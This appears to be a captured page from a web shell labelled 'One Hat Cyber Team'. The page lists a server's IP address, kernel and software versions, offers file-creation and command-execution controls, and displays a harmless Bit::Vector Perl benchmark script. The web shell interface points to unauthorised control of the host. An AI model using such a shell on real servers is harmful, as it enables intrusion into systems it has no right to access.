⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
perl-Bit-Vector-7.3
/
examples
/
View File Name :
benchmk2.pl
#!/usr/bin/perl use Benchmark; use Bit::Vector::String; $v = Bit::Vector->new(1024); $v->Primes(); $s = ''; $b = $v->to_Bin(); $o = $v->to_Oct(); $h = $v->to_Hex(); sub to_Bin { $s = $v->to_Bin(); } sub to_Oct { $s = $v->to_Oct(); } sub to_Hex { $s = $v->to_Hex(); } sub from_Bin { $v->from_Bin($b); } sub from_Oct { $v->from_Oct($o); } sub from_Hex { $v->from_Hex($h); } timethese ( 10000, { to_Bin => \&to_Bin, to_Oct => \&to_Oct, to_Hex => \&to_Hex } ); timethese ( 10000, { from_Bin => \&from_Bin, from_Oct => \&from_Oct, from_Hex => \&from_Hex } ); __END__